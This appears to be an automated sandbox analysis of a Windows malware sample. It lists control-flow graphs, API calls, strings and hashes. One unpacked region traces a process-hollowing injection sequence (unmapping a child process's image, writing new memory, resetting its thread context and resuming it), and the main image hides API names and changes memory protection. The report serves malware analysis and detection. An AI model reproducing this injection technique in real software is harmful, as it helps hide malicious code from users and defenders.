54176->54172 54177 41f2fc GetConsoleCursorInfo SetConsoleActiveScreenBuffer 54178 41f30e GlobalFlags 54177->54178 54180 41f2d8 54178->54180 54179 41f35b 54183 41f371 15 API calls 54179->54183 54184 4021a5 54179->54184 54180->54177 54180->54178 54181 41f326 54180->54181 54181->54179 54182 41f34d GetBinaryTypeA 54181->54182 54182->54181 54184->54066 54184->54154 54185->54118 54186->54124 54187->54128 54188->54130 54189->54137 54190->54145 54191->54140 54193 41f118 EnumTimeFormatsW DebugActiveProcessStop EnterCriticalSection 54192->54193 54196 41f134 54192->54196 54193->54196 54194 41f207 54194->54180 54195 41f16a CopyFileExW 54195->54196 54196->54194 54196->54195 54197 41f18e IsBadReadPtr 54196->54197 54198 41f1a9 GetConsoleMode FlushConsoleInputBuffer LoadResource 54196->54198 54200 41f14c 54196->54200 54197->54196 54198->54200 54200->54196 54201 41f1e4 GetConsoleOutputCP AddConsoleAliasW 54200->54201 54202 41ee80 13 API calls 54200->54202 54201->54200 54202->54200

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 41f450-41f466 call 4127f0 3 41f522-41f52c 0->3 4 41f46c-41f47c lstrlenA 0->4 6 41f53d-41f557 3->6 4->3 5 41f482-41f51f GetWindowInfo call 404920 call 41f0e0 call 4017c0 call 401460 call 401f40 call 401f60 call 401690 call 401010 4->5 5->3 7 41f559 6->7 8 41f5ab-41f5b5 6->8 10 41f567-41f571 7->10 11 41f55b-41f565 7->11 12 41f5c6-41f5d0 8->12 15 41f573-41f57d 10->15 16 41f57f-41f589 10->16 11->8 11->10 17 41f623-41f62d 12->17 18 41f5d2-41f5dc 12->18 15->8 20 41f5a9 16->20 21 41f58b-41f5a3 GlobalAlloc GetOverlappedResult GetLastError 16->21 24 41f63e-41f648 17->24 22 41f617-41f621 18->22 23 41f5de-41f611 GetFileAttributesW SearchPathW GetProfileStringW 18->23 20->6 21->20 22->12 23->22 25 41f682-41f6b7 GetModuleHandleA GetProcAddress call 41ec70 24->25 26 41f64a-41f651 24->26 40 41f6c8-41f6d2 25->40 30 41f653-41f658 26->30 31 41f65e-41f668 26->31 30->31 34 41f680 31->34 35 41f66a-41f66c ExitProcess 31->35 34->24 42 41f701-41f70b 40->42 43 41f6d4-41f6de 40->43 47 41f71c-41f726 42->47 45 41f6e0-41f6f9 WriteConsoleA GetProcessPriorityBoost 43->45 46 41f6ff 43->46 45->46 46->40 48 41f728-41f72f 47->48 49 41f79d-41f7a7 47->49 52 41f731 SetFileApisToANSI 48->52 53 41f737-41f741 48->53 54 41f7b8-41f7c4 49->54 52->53 56 41f743-41f749 53->56 57 41f74f-41f759 53->57 59 41f812-41f81c 54->59 60 41f7c6-41f7d0 54->60 56->57 62 41f798 57->62 63 41f75b-41f792 OpenSemaphoreW SetSystemTime 57->63 61 41f82d-41f837 59->61 65 41f7d2-41f7fe GetPrivateProfileIntA GetSystemDefaultLangID GetUserDefaultLCID SetVolumeLabelW WaitForMultipleObjects 60->65 66 41f804-41f810 call 41ed40 60->66 67 41f853-41f85d 61->67 68 41f839-41f843 61->68 62->47 63->62 65->66 66->54 74 41f86e-41f878 67->74 72 41f851 68->72 73 41f845-41f84b OpenMutexW 68->73 72->61 73->72 79 41f90f call 41f210 74->79 80 41f87e-41f885 74->80 84 41f914-41f91b 79->84 82 41f887 call 41ec90 80->82 83 41f88c-41f893 80->83 82->83 86 41f895-41f904 SystemTimeToTzSpecificLocalTime GetTimeZoneInformation MoveFileW 83->86 87 41f90a 83->87 86->87 88 41f85f-41f868 87->88 88->74
                                APIs
                                • lstrlenA.KERNEL32(004BF940), ref: 0041F471
                                • GetWindowInfo.USER32(00000000,00000000), ref: 0041F486
                                • _memset.LIBCMT ref: 0041F4AE
                                • __vsnprintf.LIBCMTD ref: 0041F4CA
                                  • Part of subcall function 0041F0E0: __vswprintf_c_l.LIBCMTD ref: 0041F0F5
                                • _wscanf.LIBCMTD ref: 0041F4DA
                                  • Part of subcall function 004017C0: _vwscanf.LIBCMTD ref: 004017DB
                                • __wrename.LIBCMTD ref: 0041F4E6
                                  • Part of subcall function 00401460: MoveFileA.KERNEL32(?,?), ref: 0040146E
                                  • Part of subcall function 00401460: GetLastError.KERNEL32 ref: 00401478
                                  • Part of subcall function 00401460: __dosmaperr.LIBCMTD ref: 00401494
                                  • Part of subcall function 00401F40: __wcstoi64.LIBCMTD ref: 00401F4D
                                • _realloc.LIBCMTD ref: 0041F4FC
                                  • Part of subcall function 00401F60: __realloc_dbg.LIBCMTD ref: 00401F74
                                • _realloc.LIBCMTD ref: 0041F508
                                • __wctomb_s_l.LIBCMTD ref: 0041F51A
                                • GlobalAlloc.KERNEL32(00000000,00000000), ref: 0041F58F
                                • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041F59D
                                • GetLastError.KERNEL32 ref: 0041F5A3
                                • GetFileAttributesW.KERNEL32(00000000), ref: 0041F5E0
                                • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 0041F5FC
                                • GetProfileStringW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041F611
                                • ExitProcess.KERNEL32 ref: 0041F66C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: ErrorFileLast_realloc$AllocAttributesExitGlobalInfoMoveOverlappedPathProcessProfileResultSearchStringWindow__dosmaperr__realloc_dbg__vsnprintf__vswprintf_c_l__wcstoi64__wctomb_s_l__wrename_memset_vwscanf_wscanflstrlen
                                • String ID: ";$&$LocalAlloc$fataravozudasikeluxuki$kernel32.dll$l
                                • API String ID: 3938695757-2103127473
                                • Opcode ID: dd37b7728e499cc6eaaf672d71664c75f0b72b3e7d85b2c73e2fbaf15ac110ed
                                • Instruction ID: 4f550f754245fe67c4af6608bfee8406fb4c8ee18d4ff5a11aef943ca236083b
                                • Opcode Fuzzy Hash: dd37b7728e499cc6eaaf672d71664c75f0b72b3e7d85b2c73e2fbaf15ac110ed
                                • Instruction Fuzzy Hash: 6CC17170A44214DBEB709F61EC06BD877B1FB14705F1080BAE509662D1DBB85ACACF5E

                                Control-flow Graph

                                APIs
                                • GetConsoleFontSize.KERNEL32(00000000,00000000), ref: 0041F24C
                                • DisconnectNamedPipe.KERNEL32(00000000), ref: 0041F25A
                                • GetLocalTime.KERNEL32(00000000), ref: 0041F262
                                • GetLastError.KERNEL32 ref: 0041F268
                                • GetCommandLineW.KERNEL32 ref: 0041F27A
                                • OpenWaitableTimerW.KERNEL32(00000000,00000000,Bim tog getarat), ref: 0041F289
                                • WritePrivateProfileStructA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0041F299
                                • ScrollConsoleScreenBufferW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041F2AB
                                • GetConsoleCursorInfo.KERNEL32(00000000,00000000), ref: 0041F300
                                • SetConsoleActiveScreenBuffer.KERNEL32(00000000), ref: 0041F308
                                • GlobalFlags.KERNEL32(00000000), ref: 0041F310
                                • GetBinaryTypeA.KERNEL32(00000000,?), ref: 0041F353
                                • RaiseException.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041F379
                                • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 0041F385
                                • GetOEMCP.KERNEL32 ref: 0041F38B
                                • SetCommMask.KERNEL32(00000000,00000000), ref: 0041F3B9
                                • GetTapeParameters.KERNEL32(00000000,00000000,?,00000000), ref: 0041F3CC
                                • VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041F3DA
                                • GetCurrentDirectoryW.KERNEL32(00000000,?), ref: 0041F3E9
                                • SetComputerNameW.KERNEL32(00000000), ref: 0041F3F1
                                • GetProcessPriorityBoost.KERNEL32(00000000,00000000), ref: 0041F3FB
                                • GlobalWire.KERNEL32(?), ref: 0041F408
                                • SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0041F412
                                • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0041F41E
                                • GetProfileSectionA.KERNEL32(00000000,?,00000000), ref: 0041F42F
                                • SetEndOfFile.KERNEL32(00000000), ref: 0041F437
                                • ExitProcess.KERNEL32 ref: 0041F43F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: Console$BufferFileGlobalProcessProfileScreen$ActiveAllocBinaryBoostCommCommandComputerCopyCreateCurrentCursorDirectoryDisconnectEnvironmentErrorExceptionExitFlagsFontHeapInfoLastLineLocalMaskNameNamedOpenParametersPipePriorityPrivateRaiseScrollSectionSizeStructTapeTimeTimerTypeVariableVirtualWaitableWireWrite
                                • String ID: Bim tog getarat
                                • API String ID: 643654911-2360557851
                                • Opcode ID: f35ea94cc5e67399b8898cc5c821b8b0caa1efff50dee3e964a7a5f634125c71
                                • Instruction ID: 0622a81d1c84dbda579c4d18b33655a96495b3e6e3a908812a9475f4f6a8f037
                                • Opcode Fuzzy Hash: f35ea94cc5e67399b8898cc5c821b8b0caa1efff50dee3e964a7a5f634125c71
                                • Instruction Fuzzy Hash: 2051FD71B44304EBF7609BA0ED0AFA876B4BB04B06F504069F709AA1D2C7B55586CF1E

                                Control-flow Graph

                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 02210156
                                • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0221016C
                                • CreateProcessA.KERNELBASE(?,00000000), ref: 02210255
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02210270
                                • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02210283
                                • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0221029F
                                • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 022102C8
                                • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 022102E3
                                • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 02210304
                                • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0221032A
                                • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 02210399
                                • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 022103BF
                                • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 022103E1
                                • ResumeThread.KERNELBASE(00000000), ref: 022103ED
                                • ExitProcess.KERNEL32(00000000), ref: 02210412
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                • String ID:
                                • API String ID: 93872480-0
                                • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                • Instruction ID: 183b284a51a4de45eb43a49aae16098dcfe43d07e968032702add6b6963ce898
                                • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                • Instruction Fuzzy Hash: ACB1C974A00209AFDB44CF98C895F9EBBB5FF88314F248158E909AB395D771AE41CF94

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 225 21787c6-21787df 226 21787e1-21787e3 225->226 227 21787e5 226->227 228 21787ea-21787f6 CreateToolhelp32Snapshot 226->228 227->228 229 2178806-2178813 Module32First 228->229 230 21787f8-21787fe 228->230 231 2178815-2178816 call 2178485 229->231 232 217881c-2178824 229->232 230->229 237 2178800-2178804 230->237 235 217881b 231->235 235->232 237->226 237->229
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 021787EE
                                • Module32First.KERNEL32(00000000,00000224), ref: 0217880E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147222942.0000000002178000.00000040.00000020.00020000.00000000.sdmp, Offset: 02178000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2178000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                • String ID:
                                • API String ID: 3833638111-0
                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                • Instruction ID: 47f8ee2e0d80c97bd150b500a7d01d30659be07c098fc818074f72e37257612f
                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                • Instruction Fuzzy Hash: EFF096316407106FD7203BF5A88DB6E77F8AFC9725F110538E643D10C0DB70E8459A61

                                Control-flow Graph

                                APIs
                                • _check_managed_app.LIBCMTD ref: 004020BC
                                • __heap_init.LIBCMTD ref: 004020C6
                                  • Part of subcall function 0040D700: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,004020CB,00000001), ref: 0040D716
                                • _fast_error_exit.LIBCMTD ref: 004020D4
                                  • Part of subcall function 00402220: ___crtExitProcess.LIBCMTD ref: 00402244
                                • _fast_error_exit.LIBCMTD ref: 004020E7
                                • __RTC_Initialize.LIBCMTD ref: 004020F9
                                • ___crtGetEnvironmentStringsW.LIBCMTD ref: 00402122
                                • ___wsetargv.LIBCMTD ref: 0040212C
                                • __wsetenvp.LIBCMTD ref: 0040213F
                                • __cinit.LIBCMTD ref: 00402154
                                • __wwincmdln.LIBCMTD ref: 00402171
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: ___crt_fast_error_exit$CreateEnvironmentExitHeapInitializeProcessStrings___wsetargv__cinit__heap_init__wsetenvp__wwincmdln_check_managed_app
                                • String ID: /F
                                • API String ID: 3184702096-1771194452
                                • Opcode ID: 3ec22e411c8fd52285535381fcd91fbd8ff705fe6c162a48788354ff2fba025c
                                • Instruction ID: 6a980c959a7c8d48d324d956dda58bb40b2b6dc1243474876414eb9caf0d603c
                                • Opcode Fuzzy Hash: 3ec22e411c8fd52285535381fcd91fbd8ff705fe6c162a48788354ff2fba025c
                                • Instruction Fuzzy Hash: 313175B1D00305DAEB14BBF2AD4679E7270AF5430CF10453FE9097B2C3EAB95545CA5A

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 198 2210420-22104f8 200 22104fa 198->200 201 22104ff-221053c CreateWindowExA 198->201 202 22105aa-22105ad 200->202 203 2210540-2210558 PostMessageA 201->203 204 221053e 201->204 205 221055f-2210563 203->205 204->202 205->202 206 2210565-2210579 205->206 206->202 208 221057b-2210582 206->208 209 2210584-2210588 208->209 210 22105a8 208->210 209->210 211 221058a-2210591 209->211 210->205 211->210 212 2210593-2210597 call 2210110 211->212 214 221059c-22105a5 212->214 214->210
                                APIs
                                • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 02210533
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateWindow
                                • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                • API String ID: 716092398-2341455598
                                • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                • Instruction ID: 143cf45b66d8c5618922490a09c9883e1e5a05c946fb3b771abf5006b85aa5e4
                                • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                • Instruction Fuzzy Hash: 9C511A70D08388EAEB11CBE8C849BDDBFF26F21708F144058D5447F28AC3BA5658CB66

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 215 41ec90-41ed2e lstrcpyA GetProcAddress VirtualProtect
                                APIs
                                • lstrcpyA.KERNEL32(004BF940,WirteosBloclsk), ref: 0041ECA7
                                • GetProcAddress.KERNEL32(?,004BF940), ref: 0041ED05
                                • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0041ED25
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: AddressProcProtectVirtuallstrcpy
                                • String ID: @$WirteosBloclsk
                                • API String ID: 1791291344-443665712
                                • Opcode ID: eda5c3b973f2cc1c20a91e7b25be575eb817952673c059a37cbdc09ab2f440ef
                                • Instruction ID: c144402572c0897a2c7b479e21aa33cb42cf219ed38fbfc6404526a7539f2262
                                • Opcode Fuzzy Hash: eda5c3b973f2cc1c20a91e7b25be575eb817952673c059a37cbdc09ab2f440ef
                                • Instruction Fuzzy Hash: 83011BA0509384FBE331CB6CEC49B467F945325724F0442B9E54C562A1C7BA100CC7BE

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 216 22105b0-22105d5 217 22105dc-22105e0 216->217 218 22105e2-22105f5 GetFileAttributesA 217->218 219 221061e-2210621 217->219 220 2210613-221061c 218->220 221 22105f7-22105fe 218->221 220->217 221->220 222 2210600-221060b call 2210420 221->222 224 2210610 222->224 224->220
                                APIs
                                • GetFileAttributesA.KERNELBASE(apfHQ), ref: 022105EC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: AttributesFile
                                • String ID: apfHQ$o
                                • API String ID: 3188754299-2999369273
                                • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                • Instruction ID: e28b8b5dc4d550e761b2378ce38154a15c716e7868a6fed9aaa08447bcf7e108
                                • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                • Instruction Fuzzy Hash: 55011E70C0429DEADB10DBD8C5587AEBFF5AF51308F148099C8092B241D7B69B98CBA1

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 238 402020-402025 call 40c120 240 40202a call 402040 238->240
                                APIs
                                • ___security_init_cookie.LIBCMTD ref: 00402025
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: ___security_init_cookie
                                • String ID:
                                • API String ID: 3657697845-0
                                • Opcode ID: 48530477e6b3aa9ffc823173576914c50dfad73354ca4523d2620214a15d67e7
                                • Instruction ID: ed5eaa065d196ada49503e4c8e3ffd0fa9bb78c5e7ea3057ed360f14b40a7ef1
                                • Opcode Fuzzy Hash: 48530477e6b3aa9ffc823173576914c50dfad73354ca4523d2620214a15d67e7
                                • Instruction Fuzzy Hash: A9A00275404B4856825433A7054BA0A794E48C4718795423A7718361D31CBCA81184AE

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 242 2178485-21784bf call 2178798 245 21784c1-21784f4 VirtualAlloc call 2178512 242->245 246 217850d 242->246 248 21784f9-217850b 245->248 246->246 248->246
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 021784D6
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147222942.0000000002178000.00000040.00000020.00020000.00000000.sdmp, Offset: 02178000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2178000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                • Instruction ID: 7d0a259e51cd8374b08e5bd379cb528fc787bb67a80051045aa2aed6847028e2
                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                • Instruction Fuzzy Hash: 7E113F79A40208EFDB01DF98C989E99BBF5AF08350F058094F9489B361D371EA50EF80

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 252 41ec70-41ec87 LocalAlloc
                                APIs
                                • LocalAlloc.KERNELBASE(00000000,?), ref: 0041EC7B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: AllocLocal
                                • String ID:
                                • API String ID: 3494564517-0
                                • Opcode ID: 64d2bfcc9db7df7529190178bb14066c0e0fce575205c888e5fbcc394cac0881
                                • Instruction ID: cb2fcc956f283b0aa368afc768fb79c4ec5211a63b8a516850aaf2ce6b333a04
                                • Opcode Fuzzy Hash: 64d2bfcc9db7df7529190178bb14066c0e0fce575205c888e5fbcc394cac0881
                                • Instruction Fuzzy Hash: 19C09BB12447089FD2809BD5FC0BF11779CD304A05F004132FD0887260D77168104F9B
                                APIs
                                • InterlockedIncrement.KERNEL32(00429CB0), ref: 00411507
                                • __invoke_watson_if_error.LIBCMTD ref: 00411546
                                • OutputDebugStringW.KERNEL32(Second Chance Assertion Failed: File ), ref: 00411553
                                • OutputDebugStringW.KERNEL32(HBB), ref: 0041157B
                                • OutputDebugStringW.KERNEL32(, Line ), ref: 00411586
                                • OutputDebugStringW.KERNEL32(?), ref: 00411593
                                • OutputDebugStringW.KERNEL32(00424234), ref: 0041159E
                                • _wcscat_s.LIBCMTD ref: 00411754
                                  • Part of subcall function 0041A6A0: __invalid_parameter.LIBCMTD ref: 0041A712
                                • __invoke_watson_if_error.LIBCMTD ref: 0041175D
                                  • Part of subcall function 004050F0: __invoke_watson.LIBCMTD ref: 00405111
                                • _wcscat_s.LIBCMTD ref: 0041178C
                                  • Part of subcall function 0041A6A0: _memset.LIBCMT ref: 0041A77F
                                  • Part of subcall function 0041A6A0: __invalid_parameter.LIBCMTD ref: 0041A7DB
                                • __invoke_watson_if_error.LIBCMTD ref: 00411795
                                • __snwprintf_s.LIBCMTD ref: 004117EE
                                  • Part of subcall function 00412320: __vsnwprintf_s_l.LIBCMTD ref: 00412342
                                • __invoke_watson_if_oneof.LIBCMTD ref: 00411827
                                • _wcscpy_s.LIBCMTD ref: 0041186C
                                • __invoke_watson_if_error.LIBCMTD ref: 00411875
                                • __invoke_watson_if_oneof.LIBCMTD ref: 004118FD
                                • _wcscpy_s.LIBCMTD ref: 0041193B
                                • __invoke_watson_if_error.LIBCMTD ref: 00411944
                                • __itow_s.LIBCMTD ref: 0041153D
                                  • Part of subcall function 0041AA90: _xtow_s@20.LIBCMTD ref: 0041AABB
                                • __strftime_l.LIBCMTD ref: 004115F3
                                • __invoke_watson_if_oneof.LIBCMTD ref: 0041162C
                                • _wcscpy_s.LIBCMTD ref: 00411671
                                • __invoke_watson_if_error.LIBCMTD ref: 0041167A
                                • _wcscpy_s.LIBCMTD ref: 004116CD
                                • __invoke_watson_if_error.LIBCMTD ref: 004116D6
                                • _wcscat_s.LIBCMTD ref: 00411707
                                • __invoke_watson_if_error.LIBCMTD ref: 00411710
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
